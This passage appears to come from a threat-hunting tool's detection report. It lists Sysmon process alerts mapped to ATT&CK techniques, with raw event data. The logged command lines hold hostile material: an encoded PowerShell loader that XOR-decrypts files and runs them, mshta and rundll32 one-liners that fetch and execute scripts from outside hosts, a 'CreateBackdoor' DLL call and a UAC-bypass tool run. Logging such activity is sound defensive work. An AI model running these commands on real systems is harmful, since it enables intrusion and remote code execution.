JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16438 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:56:12.485 + 365ABB72-25FC-5CD8-0000-0010906A1300 + 2168 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url + C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-25EC-5CD8-0000-0010CB0A1000 + 684 + C:\Python27\python.exe + python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424175 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:21.693 + 747F3D96-51FD-5F93-0000-00103B425E00 + 7504 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51F9-5F93-0000-0010551E5E00 + 9116 + C:\Windows\SysWOW64\rundll32.exe + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1601936900.530243,2020-10-06T02:28:20.530243+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2164913 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2020-10-05 22:28:20.529 + 00247C92-9E04-5F7B-0000-0010CF98272C + 12876 + C:\Windows\System32\cmd.exe + 10.0.18362.449 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\windows\system32\cmd.exe" + C:\windows\system32\ + LAPTOP-JU4M3I0E\bouss + 00247C92-8C36-5F75-0000-002034E39103 + 0x391e334 + 2 + High + SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 00247C92-9E03-5F7B-0000-0010A645272C + 20228 + C:\Windows\System32\mmc.exe + "C:\Windows\System32\mmc.exe" WF.msc + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969966.981641,2019-05-27T19:12:46.981641+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6177 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:45.437 + 365ABB72-FE6D-5CEB-0000-0010122D0C00 + 1636 + C:\Windows\System32\wbem\WMIC.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + WMI Commandline Utility + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443 + 365ABB72-FE6D-5CEB-0000-0010332A0C00 + 3876 + C:\Windows\System32\cmd.exe + cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name="swprv") get state + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424175 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:21.693 + 747F3D96-51FD-5F93-0000-00103B425E00 + 7504 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51F9-5F93-0000-0010551E5E00 + 9116 + C:\Windows\SysWOW64\rundll32.exe + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1218.005 ] Mshta found running in the system,1564435999.891564,2019-07-30T01:33:19.891564+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line (mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4904 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:18.451 + 747F3D96-661E-5D3F-0000-00107F248700 + 3164 + C:\Windows\System32\mshta.exe + 11.00.17763.1 (WinBuild.160101.0800) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=DD8B22ACEA424823BB64ABF71F61A03D41177C38,MD5=F328FDCFF05BF02C2C986D52AED8BC2A,SHA256=E616C5CE71886652C13E2E1FA45A653B44D492B054F16B15A38418B8507F57C7,IMPHASH=42DA177DE2FAA97C3DFAEC9562772A7F + 747F3D96-661E-5D3F-0000-0010A3148700 + 776 + C:\Windows\System32\cmd.exe + cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243527 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.682 + 747F3D96-9F61-5E75-0000-001059841E00 + 8076 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 424175 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:58:21.693 + 747F3D96-51FD-5F93-0000-00103B425E00 + 7504 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002019A60800 + 0x8a619 + 1 + Medium + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51F9-5F93-0000-0010551E5E00 + 9116 + C:\Windows\SysWOW64\rundll32.exe + "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true);)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4126 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 15:32:57.276 + 365ABB72-1A29-5CE4-0000-00107BE42101 + 2920 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1A29-5CE4-0000-001054E32101 + 1532 + C:\Windows\System32\cmd.exe + cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1170] Detecting Mshta,1564435999.891564,2019-07-30T01:33:19.891564+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line (mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close();) in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4904 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:18.451 + 747F3D96-661E-5D3F-0000-00107F248700 + 3164 + C:\Windows\System32\mshta.exe + 11.00.17763.1 (WinBuild.160101.0800) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=DD8B22ACEA424823BB64ABF71F61A03D41177C38,MD5=F328FDCFF05BF02C2C986D52AED8BC2A,SHA256=E616C5CE71886652C13E2E1FA45A653B44D492B054F16B15A38418B8507F57C7,IMPHASH=42DA177DE2FAA97C3DFAEC9562772A7F + 747F3D96-661E-5D3F-0000-0010A3148700 + 776 + C:\Windows\System32\cmd.exe + cmd /c mshta.exe javascript:a=GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct").Exec();close(); + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243527 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.682 + 747F3D96-9F61-5E75-0000-001059841E00 + 8076 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564845391.87585,2019-08-03T19:16:31.875850+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5536 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-03 15:16:31.676 + 747F3D96-A54F-5D45-0000-0010D83FA101 + 1716 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-A54F-5D45-0000-0010C429A101 + 6080 + C:\Windows\System32\dllhost.exe + C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4126 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 15:32:57.276 + 365ABB72-1A29-5CE4-0000-00107BE42101 + 2920 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1A29-5CE4-0000-001054E32101 + 1532 + C:\Windows\System32\cmd.exe + cmd.exe /C rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("mshta https://hotelesms.com/talsk.txt",0,true); + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1086 ] Powershell with Suspicious Argument,1611667274.399477,2021-01-26T17:21:14.399477+04:00,,Threat,Critical,"Found User (LAPTOP-JU4M3I0E\bouss) run Suspicious PowerShell commands that include (powershell,.cmd) in event with Command Line (powershell.exe start-process notepad.exe) and Parent Image :C:\Windows\SysWOW64\cmd.exe , Parent CommandLine ("C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd) in directory : ( C:\Users\bouss\source\repos\blabla\blabla\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2429138 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2021-01-26 13:21:14.021 + 00247C92-174A-6010-0000-0010C0B2D92E + 18548 + C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe + 10.0.18362.1 (WinBuild.160101.0800) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + PowerShell.EXE + powershell.exe start-process notepad.exe + C:\Users\bouss\source\repos\blabla\blabla\ + LAPTOP-JU4M3I0E\bouss + 00247C92-5082-600D-0000-0020A246F726 + 0x26f746a2 + 5 + Medium + SHA1=2223E8613BB0DD90888B17367007489FE16693E4,MD5=BCC5A6493E0641AA1E60CBF69469E579,SHA256=7762A4766BC394B4CB2D658144B207183FF23B3139181CD74E615DB63E6E57D6,IMPHASH=C6A0924236A2CDF364F3D2FAD87F702A + 00247C92-1749-6010-0000-0010EFAAD92E + 23168 + C:\Windows\SysWOW64\cmd.exe + "C:\windows\system32\cmd.exe" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd + +",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243527 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.682 + 747F3D96-9F61-5E75-0000-001059841E00 + 8076 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1602619902.353945,2020-10-14T00:11:42.353945+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\system32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 2196443 + + + + + Microsoft-Windows-Sysmon/Operational + LAPTOP-JU4M3I0E + + + + + + 2020-10-13 20:11:42.277 + 00247C92-09FE-5F86-0000-0010AD861401 + 7648 + C:\Windows\System32\cmd.exe + 10.0.18362.449 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + c:\windows\system32\cmd.exe + c:\Windows\System32\ + LAPTOP-JU4M3I0E\bouss + 00247C92-DE70-5F85-0000-002059F80600 + 0x6f859 + 1 + Medium + SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 